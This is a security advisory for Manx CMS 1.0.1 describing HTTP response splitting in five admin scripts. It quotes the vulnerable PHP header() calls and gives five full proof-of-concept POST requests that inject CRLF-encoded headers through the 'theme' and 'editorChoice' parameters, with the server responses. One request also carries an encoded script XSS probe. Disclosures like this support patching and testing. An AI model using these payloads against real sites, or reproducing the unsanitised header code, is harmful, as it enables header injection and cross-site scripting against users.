Manx 1.0.1 HTTP Response Splitting

`==============+==============+==============+==============  
  
  
Manx cms.xml 1.0.1 Multiple HTTP Response Splitting Vulnerabilities  
  
  
Vendor: Paul Jova  
Product web page: http://manx.jovascript.com  
Affected version: 1.0.1  
  
Summary: Manx is a Content Management System that uses xml text  
files to store the page contents, instead of a mysql database.  
  
Desc: Input passed to the POST parameter 'editorChoice' in  
'admin_blocks.php' and 'admin_pages.php' and the POST parameter  
'theme' in 'admin_css.php', 'admin_js.php' and 'admin_templates.php'  
is not properly sanitised before being returned to the user.  
This can be exploited to insert arbitrary HTTP headers, which  
are included in a response sent to the user.  
  
  
------------------------------------------------------------------  
  
header("Location: " . basename($_SERVER['PHP_SELF']) . "?theme=" . $_POST['theme']);  
header("Location: " . basename($_SERVER['PHP_SELF']) . "?fileName=" . $fileName . "&editorChoice=" . $_POST['editorChoice']);  
  
------------------------------------------------------------------  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache 2.2.21  
MySQL 5.5.16  
PHP 5.3.8  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2011-5059  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5059.php  
  
  
  
27.11.2011  
  
==============+==============+==============+==============  
  
  
#1  
---  
  
POST /admin/admin_blocks.php HTTP/1.1  
Content-Length: 336  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=c37nflkukq9qm3klb534n3m5r6  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
contentArea=&datePosted=2011-08-23%2020%3a40%3a15&editorChoice=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&fileName=&id=NEW_Block.xml&saveAs=&submit_delete_file=Delete%20File&submit_new_file=New&submit_save=Save&submit_save_as=Save%20As%20%2f%20NEW&submit_undo_delete=Undo%20Delete&submit_undo_save=Undo%20Save&title=New%20Block  
  
HTTP/1.1 302 Found  
Date: Sun, 27 Nov 2011 15:20:01 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: admin_blocks.php?editorChoice=  
ZSL-Custom-Header: love_injection&fileName=NEW_Block.xml  
Content-Length: 0  
Keep-Alive: timeout=5, max=11  
Connection: Keep-Alive  
Content-Type: text/html  
  
  
  
#2  
---  
  
POST /admin/admin_css.php HTTP/1.1  
Content-Length: 338  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=c37nflkukq9qm3klb534n3m5r6  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
colorSelected=&contentArea=&delete_file=Delete%20File&fileName=&id=&saveAs=&selectColor=AliceBlue&submit_get_file=Select&submit_get_theme=Select&submit_new_file=New&submit_save=Save&submit_save_as=Save%20As%20%2f%20NEW&submit_undo_delete=Undo%20Delete&submit_undo_save=Undo%20Save&theme=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection  
  
HTTP/1.1 302 Found  
Date: Sun, 27 Nov 2011 15:19:25 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: admin_css.php?theme=  
ZSL-Custom-Header: love_injection  
Content-Length: 0  
Keep-Alive: timeout=5, max=57  
Connection: Keep-Alive  
Content-Type: text/html  
  
  
  
#3  
---  
  
POST /manx_1_0_1/manx/admin/admin_js.php HTTP/1.1  
Content-Length: 301  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=c37nflkukq9qm3klb534n3m5r6  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
contentArea=&delete_file=Delete%20File&fileName=&id=&saveAs=&submit_get_file=Select&submit_get_theme=Select&submit_new_file=New&submit_save=Save&submit_save_as=Save%20As%20%2f%20NEW&submit_undo_delete=Undo%20Delete&submit_undo_save=Undo%20Save&theme=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection  
  
HTTP/1.1 302 Found  
Date: Sun, 27 Nov 2011 15:20:14 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: admin_js.php?theme=  
ZSL-Custom-Header: love_injection  
Content-Length: 0  
Keep-Alive: timeout=5, max=1  
Connection: Keep-Alive  
Content-Type: text/html  
  
  
  
#4  
---  
  
POST /admin/admin_pages.php HTTP/1.1  
Content-Length: 659  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=c37nflkukq9qm3klb534n3m5r6  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
block1=&block2=&block3=&block4=&contentArea=%26lt%3bp%26gt%3b%26quot%3b%26amp%3bgt%3b%26amp%3blt%3bscript%26amp%3bgt%3balert%281%29%26amp%3blt%3b%2fscript%26amp%3bgt%3b%26lt%3b%2fp%26gt%3b&datePosted=2011-11-27%2015%3a53%3a21&editorChoice=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&fileName=&footer=&header=&id=NEW_Page.php&meta_description=%22%3e&meta_keywords=&saveAs=&submit_delete_file=Delete%20File&submit_new_file=New&submit_publish=Publish&submit_save=Save&submit_save_as=Save%20As%20%2f%20NEW&submit_undo_delete=Undo%20Delete&submit_undo_save=Undo%20Save&submit_unpublish=Un-Publish&template=&theme=&title=New%20Page&view_page_btn=View%20Page  
  
HTTP/1.1 302 Found  
Date: Sun, 27 Nov 2011 15:18:43 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: admin_pages.php?editorChoice=  
ZSL-Custom-Header: love_injection&fileName=NEW_Page.xml  
Content-Length: 0  
Keep-Alive: timeout=5, max=70  
Connection: Keep-Alive  
Content-Type: text/html  
  
  
  
#5  
---  
  
POST /admin/admin_templates.php HTTP/1.1  
Content-Length: 301  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=c37nflkukq9qm3klb534n3m5r6  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
contentArea=&delete_file=Delete%20File&fileName=&id=&saveAs=&submit_get_file=Select&submit_get_theme=Select&submit_new_file=New&submit_save=Save&submit_save_as=Save%20As%20%2f%20NEW&submit_undo_delete=Undo%20Delete&submit_undo_save=Undo%20Save&theme=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection  
  
HTTP/1.1 302 Found  
Date: Sun, 27 Nov 2011 15:19:13 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: admin_templates.php?theme=  
ZSL-Custom-Header: love_injection  
Content-Length: 0  
Keep-Alive: timeout=5, max=68  
Connection: Keep-Alive  
Content-Type: text/html  
`